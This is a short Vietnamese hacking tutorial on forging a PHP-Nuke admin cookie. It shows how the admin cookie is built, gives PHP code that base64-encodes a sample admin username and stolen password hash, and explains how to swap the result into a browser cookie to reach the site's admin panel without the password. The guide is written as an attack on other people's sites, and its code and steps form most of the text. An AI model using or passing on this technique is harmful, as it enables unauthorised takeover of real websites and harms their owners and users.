Hướng dẫn fake cookie cho PHP-Nuke

Hướng dẫn fake cookie cho PHP-Nuke


--------------------------------------------------------------------------------

Sau khi có được passhash của thằng admin việc cần phải làm lúc này là làm sao login vào trang quản lý của nó. Chúng ta có thể crack pass của nó nhưng mà cách này mang tính hên xui và khả năng thành công hơi thấp vì vậy fake cookie có vẻ khả quan hơn.
Bây giờ xem qua đoạn code tạo cookie cho thằng admin, nó như thế này đây:

$admin = base64_encode("$aid:$pwd:$admlanguage");
setcookie("admin","$admin",time()+2592000);

Nó dùng base64_encode. OK chúng ta sẽ dùng code sau để tạo cookie:

$aid = "xavuong"; //cái này là user của admin
$pwd = "839361742baa800c3d4eb295a6b69c6d"; //còn cái này là passhash
$admlanguage = ""; //cái này tùy thuộc vào column admlanguage trong db, thông thường thì chẳng có gì
$xv = base64_encode("$aid:$pwd:$admlanguage");
echo "$xv";

Sau khi chạy code trên nó ra thế này:

eGF2dW9uZzo4MzkzNjE3NDJiYWE4MDBjM2Q0ZWIyOTVhNmI2OW M2ZDo=

Bây giờ chúng ta sẽ bỏ dấu = ở đằng sau đi và thêm vào đó %3D nó sẽ thành thế này

eGF2dW9uZzo4MzkzNjE3NDJiYWE4MDBjM2Q0ZWIyOTVhNmI2OW M2ZDo%3D

Việc chuẩn bị xong rùi, bây giờ mở Opera ra, vào trang của nó đăng ký 1 cái nick rùi login vào nó sẽ tạo cho mình cái cookie có dạng:

nuke lang: english
nuke user: MzpjdW9uZ3Bob25nOjIzZjQ3NGFlZng5NWZhOWYxMGI5ZTViYj VhYjgwNGQ1OjEwOjowOjA6MDowOjo0MDk2

Việc tiếp theo vào Tool - Advanced - Cookies chọn cái tên site của nó rùi chọn cái nuke user rùi chọn tiếp edit. Sửa cái user thành admin và sửa cái MzpjdW9uZ3Bob25nOjIzZjQ3NGFlZng5NWZhOWYxMGI5ZTViYj VhYjgwNGQ1OjEwOjowOjA6MDowOjo0MDk2 thành cái mà chúng ta đã tạo ở trên eGF2dW9uZzo4MzkzNjE3NDJiYWE4MDBjM2Q0ZWIyOTVhNmI2OW M2ZDo%3D. Mọi việc đã xong chỉ cần chạy link admin là bạn có thể vào trang quản lý của nó.



Longnhi(HCE)